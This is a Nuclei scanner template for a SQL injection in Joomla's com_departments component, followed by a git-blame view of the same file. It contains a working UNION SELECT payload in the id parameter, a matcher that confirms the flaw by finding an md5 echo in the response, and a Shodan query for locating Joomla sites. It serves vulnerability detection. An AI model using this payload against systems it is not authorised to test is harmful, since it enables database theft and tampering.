nuclei-templates/http/vulnerabilities/joomla/joomla-department-sqli.yaml

id: joomla-department-sqli

info:
  name: Joomla `departments` - SQL Injection
  author: ritikchaddha
  severity: high
  description: |
    Joomla! `com_departments` parameter contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://github.com/opensec-cn/kunpeng/blob/master/plugin/json/joomla_departments_sqli.json
    - https://github.com/w3bd0gs/cocoworker/blob/master/plugins/beebeeto/poc_2014_0170.py
  metadata:
    max-request: 1
    shodan-query: http.component:"Joomla"
  tags: joomla,sqli
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_departments&id=-1%20UNION%20SELECT%201,md5({{num}}),3,4,5,6,7,8--"

    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

# digest: 4b0a00483046022100ec5004fa2c0a7c1a7545d4a168fb85972b77589d2a13a82cf344e5596e4ef5bd022100ea44a9340cb2bb969ddb188d51baeed6e2b9f1a4e55f6d1646b2a4787f30eedc:922c64590222798bb761d5b6d8e72950
Create joomla-department-sqli.yaml 2023-08-07 18:02:13 +00:00			`id: joomla-department-sqli`

			`info:`
			name: Joomla `departments` - SQL Injection
			`author: ritikchaddha`
			`severity: high`
			`description: \|`
			Joomla! `com_departments` parameter contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
			`reference:`
			`- https://github.com/opensec-cn/kunpeng/blob/master/plugin/json/joomla_departments_sqli.json`
minor update 2023-08-07 18:27:13 +00:00			`- https://github.com/w3bd0gs/cocoworker/blob/master/plugins/beebeeto/poc_2014_0170.py`
Create joomla-department-sqli.yaml 2023-08-07 18:02:13 +00:00			`metadata:`
			`max-request: 1`
			`shodan-query: http.component:"Joomla"`
			`tags: joomla,sqli`
			`variables:`
			`num: "999999999"`

			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/index.php?option=com_departments&id=-1%20UNION%20SELECT%201,md5({{num}}),3,4,5,6,7,8--"`

			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '{{md5(num)}}'`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4b0a00483046022100ec5004fa2c0a7c1a7545d4a168fb85972b77589d2a13a82cf344e5596e4ef5bd022100ea44a9340cb2bb969ddb188d51baeed6e2b9f1a4e55f6d1646b2a4787f30eedc:922c64590222798bb761d5b6d8e72950`